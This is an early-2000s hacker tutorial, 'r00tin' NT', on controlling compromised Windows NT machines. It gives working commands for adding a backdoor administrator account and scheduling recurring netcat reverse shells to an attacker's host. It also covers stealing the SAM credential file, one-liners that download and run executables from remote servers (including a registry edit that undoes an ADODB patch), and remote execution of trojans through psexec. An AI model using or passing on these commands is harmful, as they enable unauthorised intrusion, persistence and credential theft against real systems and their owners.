...
ouuuuuZHH@Auuuuuu23;
.:38A@NMMMMMNMMMMN22AMMMMNHHHH@A77;:
,;88bU78u338@HHHUu333ZEMMMMMMMMMMMMMNHU:
7bE877: .,;27, .;uu@MNR8888U8@MMMMMMMMUo
.;283. :;72883,,,:;o732uR2RMMMMMMMMMNR.
,2E2, .: ;;: .28b822222222222RNMMMHRAAUo
7A8 .,2.o2; 72228@MMMMMMMME8uHMM@7
.oA2, .; .,72ubRU2;;;;322b@EEb3;oRNMN:.
.;H, ,::,7: 8bAH2223 ;8oo38MH2.
;u8 :oo23: .2u8bbo, o2228Z7 , :AMMU.
::. ,::: . ;u8;;, :;;;bU2;;..;Z@; .NMNR
H; , :ubUZ3; .;8::,.22;.;HNMH
;HZ, ;oo8Z; .. RNA:ZEMH
2M ,:: oZZ8Z8U8ENMH
2M ;. MMMH C:\> r00tin' NT
7M . ,oAMMMRZ22, ZEMH C:\> illwill
;M .8bAb, .7@MMMMMMMMM@8; ;bHo. C:\> xillwillx@yahoo.com
,uU: ;bMUo. 7MMMMMMMMMMMMMH8 3MM7. C:\> http://illmob.org
Ho. :UU@Eu. 7o: 7MMMMNEMNNMMMMMM 7EM@o
;U2 .2AHME;. ,ZRRRNMHR,. ;MMMHEAHEEMMMMMN ,uMM3
u8u .; 3MMM3 .8NMMMMMMMMMA3. .3MMMMHRHMMMMME; 3MMA7
ZH7 ,2MM3 78MMMMMMMMMMMMMH7 .ZR@MMMMMHR3. ;bMM:
,o@u: .,;MM2 ZMMMMMMMMMMMMMMMN, .,77777;. ,AMN2.
.EA3 88ZuHMb7 2HMMMMMMMMMMMMMMM, :MME2
.;ZRu3: . ,EA7 7bMMMMMMR@N@HMMNU. :NE2. 2@NMb;
.:7bAb8,. .3. ,HNMMMMMMN@HHU; MMHA 7UMZ;
.3uZ8bH, o2UMMMMHu3: uHMH7 ,8NM
,ZMR. ..... ... 2@@
,2RZ;... .. ...... . .,;. :8M
7ZRHMMbuuub@@bUAREHMUo .288uuuu2;2AMH8RNR
.,,,,,,,3bE@NNNNMNMNE7Eb8NMNN@ 2M@o,,.
.:33333;ouU@NRRHN2oo7:ZE@7.
.78;. ,;:
Tutorial started fall of 2003.
So you got a command shell prompt with your '0day s00p3r h4x0rin .c skrypt'
and you dont know what the fuck a command prompt is cuz you don't know shit about DOS
and cant do anything without a pretty point-n-click GUI interface. and need to get your
UPX/hex-edited/undetected s00per trojan loaded onto it and be a real hax0r.
+++ r00tin' NT
- 0x01. The Basics
+ What are net commands?
+ What are some net commands?
+ What is NetBIOS?
+ Creating a local admin account.
+ How to transfer files to and from.
+ How do I execute those files remotely?
0x01. The Basics - What are net commands?
`````````````````````````````````````````
What are net command exactly? Net commands are commands used in order to show information regarding
a server or network which can include information on the servers, networks, shares, and connections.
Other commands include commands in which you can edit user accounts, groups, and other configuration
types.
0x01. The Basics - What are some net commands?
``````````````````````````````````````````````
What are some net commands? There are various net commands in which you can use to view server info.
Some of these net commands would include the ever popular NET use, NET share and NET view. But these
arent the only net commands available. There is a wide variety of net command and they are as followed:
- NET Accounts - NET Print
- NET Computer - NET Send
- NET Config Server - NET Session
- NET Config Workstation - NET Share
- NET Continue - NET Statistics Server
- NET File - NET Statistics Workstation
- NET Group - NET Stop
- NET Help - NET Time
- NET Helpmsg - NET Use
- NET Localgroup - NET User
- NET Name - NET Ver
- NET Pause - NET View
Net commands are great ways to spy on hacked windows NT servers because your checking on the network's
status. The most widely used net commands in NT hacking are NET View, NET Share, and NET Use because they
each do a certain thing which can be used for attacking. NET View, which is used to display a list of
resources being shared on the attacked computer, NET Share which will display a list of information about
all the resources that are being shared on the attacked computer which can also be used to create network
shares, and last but not least NET Use which will display a list of connected computers which also has
options for connecting and disconnecting from previously made shares. With those 3 commands, you have the
ability to be able to do an attack called NetBIOS hacking.
0x01. The Basics - Creating a local admin account and a backup shell.
``````````````````````````````````````````````````
First off i always start off with making myself an admin on the computer just in case the shell is lost.
Add your name to admin group:
net user [username] [password] /add
net localgroup administrators [username] /add
( C:\WINNT\System32>net user GOD 0wned /add )
( C:\WINNT\System32>net localgroup administrators GOD /add )
***From muts from whitehat.co.il 8/19/04
Once I had the shell, I had to create some "Backup Shells" in case the connection gets severed.
There's nothing worse than losing the only single connection to a penetrated machine…
I did this using the "at" command, sending myself a NetCat shell every 15 minutes.
I found myself smiling every 15 minutes.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS>time
time
The current time is: 0:18:13.01
Enter the new time:
C:\WINDOWS>at 0:19 ""nc.exe -v illmob.reversedns.com 443 -d -e cmd.exe""
at 0:19 ""nc.exe -v illmob.reversedns.com 443 -d -e cmd.exe""
Added a new job with job ID = 1
0x01. The Basics - How to transfer files to and from.
`````````````````````````````````````````````````````
Now's a good time to transfer some files :)
here are some good methods of transferring files that i use:
1. Open the c: drive up for file sharing/transferring
C:\>NET SHARE shareME=C:
which u can connect to in your browser window \\victimsIP\shareME
or type in YOUR dos prompt
c:>NET USE x: \\VICTIMip\shareME /user:GOD
2. TFTP transfers (u need to have a TFTP server running on your computer)
http://www.solarwinds.net/Tools/Free_tools/TFTP_Server/
TFTP [-i] YOURIP [GET | PUT] source [destination]
C:\WINNT\SYSTEM32>TFTP -i 127.0.0.1 GET SAM c:\rootedSAMS
3. from a command prompt echo ftp commands into a .bat file and execute it
echo user >>c:\$.tmp
echo >>c:\$.tmp
echo lcd c:\windows >>c:\$.tmp
echo binary >>c:\$.tmp
echo get >>c:\$.tmp
echo quit >>c:\$.tmp
ftp -v -i -n -s:c:\$.tmp c:\$$.tmp
del c:\$.tmp
del c:\$$.tmp
4. i have created a commandline webdownloader which allows you to grab a file from a website and execute it
its more reliable when transferring files (ftp server have timeouts , TFTP uses UDP packets so it fails alot)
http://illmob.org/files/illmob/cmdget.zip
u need to get it on the server.exe using the above choices then you can use it normally
cmdget http://blah.com/trojan.exe c:\0wned.exe
well how would i get your exe onto the hacked server illwill u dumbass you might ask
well you could use this program brainbuster made...basically its a gui front-end to create a debug script
that you can paste into a shell line by line that will create a bat file that will re-compile the script into .exe
http://illmob.org/files/0day/exe2txt.zip
***Added from 101 on GSO forums 5/31/04
A small tip now if you wanna use secureCRT in listening mode to be able then to copy paste the huge .txt without problems:
-*example*-
your localip = 192.168.0.2
run a listening netcat1 : nc.exe -vv -L -p 12345 -t -e cmd.exe -s 192.168.0.2
With SecureCRT , do a simple telnet connection on 192.168.0.2:12345
(youll have a shell of course on your own computer trough securecrt)
Open now another listening netcat2 through this local sCRT shell, you'll be able
finally to copy paste this huge txt if a victim spawn a shell to this netcat2
*****
*i would also recommend dropping a copy of netcat onto the server because you can do a shitload of stuff with it
like file transfers .. you would start nc listening on a port and then on your computer
c:\>nc (vic_ip) (vic_port) < file.exe
-------------------- SNIP----------------------
echo Dim HTTPGET >>c:\dl.vbs && echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >>c:\dl.vbs && echo HTTPGET.Open "GET", "http://www.illmob.org/test.exe", false >>c:\dl.vbs && echo HTTPGET.Send >>c:\dl.vbs && echo DataBin = HTTPGET.ResponseBody >>c:\dl.vbs && echo Const adTypeBinary=1 >>c:\dl.vbs && echo Const adSaveCreateOverWrite=2 >>c:\dl.vbs && echo Dim SendBinary >>c:\dl.vbs && echo Set SendBinary = CreateObject("ADODB.Stream") >>c:\dl.vbs && echo SendBinary.Type = adTypeBinary >>c:\dl.vbs && echo SendBinary.Open >>c:\dl.vbs && echo SendBinary.Write DataBin >>c:\dl.vbs && echo SendBinary.SaveToFile "c:\test.exe", adSaveCreateOverWrite >>c:\dl.vbs && cscript //Nologo /B c:\dl.vbs && start c:\test.exe && del /s c:\dl.vbs
------------------END SNIP----------------------
oh they patched their system for the adodb stream? ha!
just paste this simple in the shell first
and youll be able to do it in no time
-------------------- SNIP----------------------
echo Windows Registry Editor Version 5.00 >>c:\fix.reg && echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000566-0000-0010-8000-00AA006D2EA4}] >>c:\fix.reg && echo "Compatibility Flags"=- >>c:\fix.reg && regedit /s c:\fix.reg
------------------END SNIP----------------------
Method #2 ftp downloading
change the ftp.blah.com to the own ftp+dir and add your username/pass
-------------------- SNIP----------------------
echo user USERNAME >>c:\$.tmp && echo PASS >>c:\$.tmp && echo binary >>c:\$.tmp && echo get test.exe >>c:\$.tmp && echo quit >>c:\$.tmp && ftp -v -i -n -s:c:\$.tmp ftp.blah.com c:\$$.tmp && start c:\test.exe && del c:\$.tmp && del c:\$$.tmp
------------------END SNIP----------------------
Method #3 tftp downloading
you need a tftp server running on yourself
change the yourserver.com to your ip or dns name
-------------------- SNIP----------------------
tftp -i yourserver.com get yourfile.exe && start yourfile.exe
------------------END SNIP----------------------
0x01. The Basics - How do I execute those files remotely?
`````````````````````````````````````````````````````````
Having trouble trying to execute files remotely?
Try PSEXEC http://www.sysinternals.com/ntw2k/freeware/psexec.shtml/
psexec -u [username] -p [password] [command]
if I created a user "GOD" with the password "0wn3d"
C:\>psexec -u GOD -p 0wn3d blah.exe
or if you wanna have their TFTP connect back to u and retrieve a file
c:\>psexec -u GOD -p 0wn3d "tftp -i 127.0.0.1 get trojan.exe"
NOTE: Psexec will only work if you add an administrator user first,
and if the computer doesnt have remote administrating disabled,
or one of the ports firewalled out.
or try RemoExec http://securityfriday.com/ToolDownload/Remoxec/remoxec_doc.html
Remoxec executes a program using DCOM. Just supply an IP,USER,PASS,and the EXE
you wanna execute.
this a working textfile that i have been kicking around ill keep adding to it sooner or later when i get some more time
-peace
illwill